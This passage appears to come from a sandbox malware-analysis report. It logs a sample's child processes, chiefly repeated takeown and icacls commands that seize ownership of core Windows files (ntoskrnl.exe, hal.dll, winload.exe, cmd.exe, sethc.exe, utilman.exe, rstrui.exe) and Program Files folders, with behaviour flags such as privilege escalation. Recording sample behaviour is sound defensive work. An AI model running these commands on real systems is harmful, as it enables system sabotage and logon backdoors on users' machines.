- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3604
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin" /a
  2⤵
  PID:400
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin" /grant Administrators:F
  2⤵
  PID:8
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin\S-1-5-21-83325578-304917428-1200496059-1000" /a
  2⤵
  PID:4736
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\$Recycle.Bin\S-1-5-21-83325578-304917428-1200496059-1000" /grant Administrators:F
  2⤵
  PID:1780
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\9067c5701a2f6bcc5b" /a
  2⤵
  PID:724
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\9067c5701a2f6bcc5b" /grant Administrators:F
  2⤵
  PID:2112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\95a9da8d6083c53f11d88fcfaf8c" /a
  2⤵
  PID:4176
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\cmd.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\95a9da8d6083c53f11d88fcfaf8c" /grant Administrators:F
  2⤵
  PID:1668
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\cmd.exe" /grant Administrators:F
  2⤵
  PID:4820
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Documents and Settings" /a
  2⤵
  PID:3048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Documents and Settings" /grant Administrators:F
  2⤵
  PID:3972
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\PerfLogs" /a
  2⤵
  PID:4132
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\PerfLogs" /grant Administrators:F
  2⤵
  PID:648
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files" /grant Administrators:F
  2⤵
  PID:1948
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\regedit.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3492
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\regedit.exe" /grant Administrators:F
  2⤵
  PID:3420
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\reg.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\reg.exe" /grant Administrators:F
  2⤵
  PID:4320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskmgr.exe" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskmgr.exe" /grant Administrators:F
  2⤵
  PID:3456
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip" /a
  2⤵
  PID:100
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\msconfig.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3816
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip" /grant Administrators:F
  2⤵
  PID:4924
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\msconfig.exe" /grant Administrators:F
  2⤵
  PID:5048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\7z.exe" /a
  2⤵
  PID:3192
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\7z.exe" /grant Administrators:F
  2⤵
  PID:1400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\Lang" /a
  2⤵
  PID:4972
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\Lang" /grant Administrators:F
  2⤵
  PID:2588
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2832
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files" /grant Administrators:F
  2⤵
  PID:2248
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\utilman.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\DESIGNER" /a
  2⤵
  PID:4372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\utilman.exe" /grant Administrators:F
  2⤵
  PID:4368
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\DESIGNER" /grant Administrators:F
  2⤵
  PID:1680
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3472
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared" /grant Administrators:F
  2⤵
  PID:2648
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ClickToRun" /a
  2⤵
  PID:4692
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sethc.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4664
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ClickToRun" /grant Administrators:F
  2⤵
  PID:4116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sethc.exe" /grant Administrators:F
  2⤵
  PID:4320
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe" /a
  2⤵
  PID:2348
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe" /grant Administrators:F
  2⤵
  PID:4272
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:776
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink" /grant Administrators:F
  2⤵
  PID:4012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4308
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\InputPersonalization.exe" /grant Administrators:F
  2⤵
  PID:5000
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.exe" /grant Administrators:F
  2⤵
  PID:3116
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ar-SA" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1780
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ar-SA" /grant Administrators:F
  2⤵
  PID:1984
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\bg-BG" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3180
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\bg-BG" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:5108
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5084
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ" /grant Administrators:F
  2⤵
  PID:512
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\da-DK" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\da-DK" /grant Administrators:F
  2⤵
  PID:3904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.msc" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5012
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\de-DE" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.msc" /grant Administrators:F
  2⤵
  - Modifies file permissions
  PID:2864
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\de-DE" /grant Administrators:F
  2⤵
  PID:4176
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\el-GR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3300
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\el-GR" /grant Administrators:F
  2⤵
  PID:4572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\en-GB" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4464
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\en-GB" /grant Administrators:F
  2⤵
  PID:4800
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\en-US" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\resmon.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4320
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\en-US" /grant Administrators:F
  2⤵
  PID:1420
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\resmon.exe" /grant Administrators:F
  2⤵
  PID:2376
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\es-ES" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\es-ES" /grant Administrators:F
  2⤵
  PID:3684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\es-MX" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1328
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\es-MX" /grant Administrators:F
  2⤵
  PID:4308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\et-EE" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4964
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\et-EE" /grant Administrators:F
  2⤵
  PID:1016
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\logonui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4744
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fi-FI" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\logonui.exe" /grant Administrators:F
  2⤵
  PID:2592
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fi-FI" /grant Administrators:F
  2⤵
  PID:3904
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fr-CA" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fr-CA" /grant Administrators:F
  2⤵
  PID:3808
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fr-FR" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fr-FR" /grant Administrators:F
  2⤵
  PID:452
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions" /grant Administrators:F
  2⤵
  PID:4928
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskkill.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3884
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\taskkill.exe" /grant Administrators:F
  2⤵
  PID:2100
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad" /grant Administrators:F
  2⤵
  PID:3288
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4444
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert" /grant Administrators:F
  2⤵
  PID:4044
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2708
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad" /grant Administrators:F
  2⤵
  PID:4572
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2108
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main" /grant Administrators:F
  2⤵
  PID:3784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rundll32.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:872
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3296
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rundll32.exe" /grant Administrators:F
  2⤵
  PID:4520
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui" /grant Administrators:F
  2⤵
  PID:4748
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu" /grant Administrators:F
  2⤵
  PID:2308
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4740
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav" /grant Administrators:F
  2⤵
  PID:4132
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2216
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\rstrui.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2384
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad" /grant Administrators:F
  2⤵
  PID:1080
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\rstrui.exe" /grant Administrators:F
  2⤵
  PID:3640
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1112
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred" /grant Administrators:F
  2⤵
  PID:2176
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3164
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols" /grant Administrators:F
  2⤵
  PID:400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\he-IL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\he-IL" /grant Administrators:F
  2⤵
  PID:4628
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\hr-HR" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1140
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\sfc.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4076
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\hr-HR" /grant Administrators:F
  2⤵
  PID:3192
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\sfc.exe" /grant Administrators:F
  2⤵
  PID:4120
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\hu-HU" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2764
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\hu-HU" /grant Administrators:F
  2⤵
  PID:1328
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4452
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization" /grant Administrators:F
  2⤵
  PID:2260
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\it-IT" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:3184
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\it-IT" /grant Administrators:F
  2⤵
  PID:2684
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ja-JP" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2884
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ja-JP" /grant Administrators:F
  2⤵
  PID:5020
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\winload.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ko-KR" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4116
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\winload.exe" /grant Administrators:F
  2⤵
  - Possible privilege escalation attempt
  PID:644
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ko-KR" /grant Administrators:F
  2⤵
  PID:3960
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\LanguageModel" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4888
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\LanguageModel" /grant Administrators:F
  2⤵
  PID:112
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\lt-LT" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\lt-LT" /grant Administrators:F
  2⤵
  PID:1260
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\lv-LV" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4084
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\ntoskrnl.exe" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4900
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\lv-LV" /grant Administrators:F
  2⤵
  PID:1716
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\ntoskrnl.exe" /grant Administrators:F
  2⤵
  PID:4444
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\nb-NO" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:100
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\nb-NO" /grant Administrators:F
  2⤵
  PID:4464
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\nl-NL" /a
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\nl-NL" /grant Administrators:F
  2⤵
  PID:4372
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pl-PL" /a
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2764
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pl-PL" /grant Administrators:F
  2⤵
  PID:532
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\system32\hal.dll" /a
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:4388
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pt-BR" /a
  2⤵
  PID:3596
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\system32\hal.dll" /grant Administrators:F
  2⤵
  PID:4476
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pt-BR" /grant Administrators:F
  2⤵
  PID:2544
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\pt-PT" /a
  2⤵
  PID:3656
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\pt-PT" /grant Administrators:F
  2⤵
  PID:3048
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ro-RO" /a
  2⤵
  PID:4132
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ro-RO" /grant Administrators:F
  2⤵
  PID:4732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\ru-RU" /a
  2⤵
  PID:732
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\servicing\trustedinstaller.exe" /a
  2⤵
  PID:3372
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\ru-RU" /grant Administrators:F
  2⤵
  PID:2484
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\windows\servicing\trustedinstaller.exe" /grant Administrators:F
  2⤵
  PID:2220
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sk-SK" /a
  2⤵
  PID:5016
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sk-SK" /grant Administrators:F
  2⤵
  PID:508
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sl-SI" /a
  2⤵
  PID:4920
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sl-SI" /grant Administrators:F
  2⤵
  PID:400
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS" /a
  2⤵
  PID:5048
- C:\windows\system32\icacls.exe
  "C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS" /grant Administrators:F
  2⤵
  PID:3316
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\microsoft shared\ink\sv-SE" /a
  2⤵
  PID:2388
- C:\windows\system32\takeown.exe
  "C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\cmd.exe" /a
  2⤵
  PID:3760
- C:\windows\system32\icacls.exe
